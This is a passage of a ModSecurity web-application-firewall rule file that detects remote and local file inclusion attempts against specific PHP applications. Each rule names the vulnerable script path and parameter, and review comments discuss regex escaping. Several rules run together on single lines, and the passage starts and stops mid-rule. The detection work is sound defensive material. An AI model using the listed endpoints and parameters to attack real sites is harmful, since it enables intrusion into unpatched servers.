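SecRule &TX:'/RFI.*ARGS:CONFIG\x5bgameroot\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[gameroot]" is a character class and the selector cannot match the
# parameter name CONFIG[gameroot]. The plain ARGS:CONFIG[gameroot] selector in
# rule 2009503 is not written as a regular expression and is left as it was.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2009503) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /server_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009503,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009504) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /qlib/smarty.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009504,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:CONFIG\x5bgameroot\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Remote File 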
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009505) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /qlib/smarty.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009505,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009746) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /qte_web.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009746,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:qte_web_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009723) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /qte_web.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009723,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:qte_web_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /bin/qte_init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009724,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:qte_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009788) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RSS-aggregator display.php path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /display.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009788,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS RSS-aggregator display.php path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29873'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
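WEB_SPECIFIC_APPS RSS-aggregator display.php path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[library_path]" is a character class and the selector cannot match the
# parameter name config[library_path].
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2010097) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RaXnet Cacti top_graph_header.php config Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /include/top_graph_header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010097,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS RaXnet Cacti top_graph_header.php config Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,14030'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:config\x5blibrary_path\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RaXnet Cacti top_graph_header.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009101) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS REALTOR define.php Remote File Inclusion
SecRule REQUEST_LINE "@contains /define.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009101,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS REALTOR define.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33227'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:INC_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS REALTOR define.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009059) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator add_tmsp.php mosConfig_absolute_path parameter remote file inclusion
SecRule REQUEST_LINE "@contains 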
/tmsp/add_tmsp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009059,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Feederator add_tmsp.php mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator add_tmsp.php mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009060) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator edit_tmsp.php mosConfig_absolute_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /tmsp/edit_tmsp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009060,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Feederator edit_tmsp.php mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator edit_tmsp.php mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009061) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator subscription.php GLOBALS mosConfig_absolute_path parameter remote file inclusion SecRule REQUEST_LINE "@contains /tmsp/subscription.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009061,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Recly 
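Feederator subscription.php GLOBALS mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:GLOBALS\x5bmosConfig_absolute_path\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator subscription.php GLOBALS mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[mosConfig_absolute_path]" is a character class and the selector cannot
# match the parameter name GLOBALS[mosConfig_absolute_path]; the selector
# above is escaped accordingly.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2009062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Feederator tmsp.php mosConfig_absolute_path parameter remote file inclusion
SecRule REQUEST_LINE "@contains /tmsp/tmsp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009062,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Feederator tmsp.php mosConfig_absolute_path parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32194'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Feederator tmsp.php mosConfig_absolute_path parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009466) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Competitions Component add.php GLOBALS Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /includes/competitions/add.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009466,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Competitions Component add.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32192'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule 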
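&TX:'/RFI.*ARGS:GLOBALS\x5bmosConfig_absolute_path\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Competitions Component add.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[mosConfig_absolute_path]" is a character class and the selector cannot
# match the parameter name GLOBALS[mosConfig_absolute_path]; the selector
# above and the one in rule 2009467 are escaped accordingly.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2009467) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Competitions Component competitions.php GLOBALS Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /includes/competitions/competitions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009467,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Competitions Component competitions.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32192'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:GLOBALS\x5bmosConfig_absolute_path\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Competitions Component competitions.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009468) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Recly Competitions Component settings.php mosConfig_absolute_path Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /includes/settings/settings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009468,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Recly Competitions Component settings.php mosConfig_absolute_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32192'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Recly Competitions Component 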
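settings.php mosConfig_absolute_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[INCLUDE_PATH]" is a character class and the selector cannot match the
# parameter name REX[INCLUDE_PATH]; both &TX selectors in this block are
# escaped accordingly.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2011254) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redaxo CMS index.inc.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /include/addons/version/pages/index.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011254,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Redaxo CMS index.inc.php Remote File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:REX\x5bINCLUDE_PATH\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redaxo CMS index.inc.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redaxo CMS specials.inc.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /include/pages/specials.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011255,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Redaxo CMS specials.inc.php Remote File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:REX\x5bINCLUDE_PATH\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redaxo CMS specials.inc.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010124) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SERWeb load_lang.php configdir Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /load_lang.php" 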
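"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010124,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SERWeb load_lang.php configdir Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,26747'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:_SERWEB\x5bconfigdir\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SERWeb load_lang.php configdir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[configdir]" and "[functionsdir]" are character classes and the selectors
# cannot match the parameter names _SERWEB[configdir] and
# _SERWEB[functionsdir]; both &TX selectors in this block are escaped.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2010125) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SERWeb main_prepend.php functionsdir Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /main_prepend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010125,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SERWeb main_prepend.php functionsdir Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,26747'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:_SERWEB\x5bfunctionsdir\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SERWeb main_prepend.php functionsdir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009653) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_css Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /theme/format.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009653,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_css Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34569'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule 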
&TX:'/RFI.*ARGS:_page_css/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SMA-DB format.php _page_css Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009654) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_javascript Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /theme/format.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009654,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_javascript Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34569'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_page_javascript/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SMA-DB format.php _page_javascript Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_content Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /theme/format.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SMA-DB format.php _page_content Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34569'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_page_content/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SMA-DB format.php _page_content Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011209) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 
ClearSite device_admin.php cs_base_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/admin/device_admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011209,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ClearSite device_admin.php cs_base_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'cve,CVE-2010-2145'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cs_base_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClearSite device_admin.php cs_base_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_workbook.inc.php class_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /classes/excel/class.writeexcel_workbook.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010922,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_workbook.inc.php class_path Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/saurus-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_workbook.inc.php class_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_worksheet.inc.php class_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains 
/classes/excel/class.writeexcel_worksheet.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010923,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_worksheet.inc.php class_path Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0912-exploits/saurus-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS class.writeexcel_worksheet.inc.php class_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009123) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SezHoo SezHooTabsAndActions.php IP Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /SezHooTabsAndActions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009123,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SezHoo SezHooTabsAndActions.php IP Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/6751'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:IP/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SezHoo SezHooTabsAndActions.php IP Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003746) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple PHP Script Gallery Remote Inclusion index.php gallery SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003746,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Simple PHP Script Gallery Remote Inclusion 
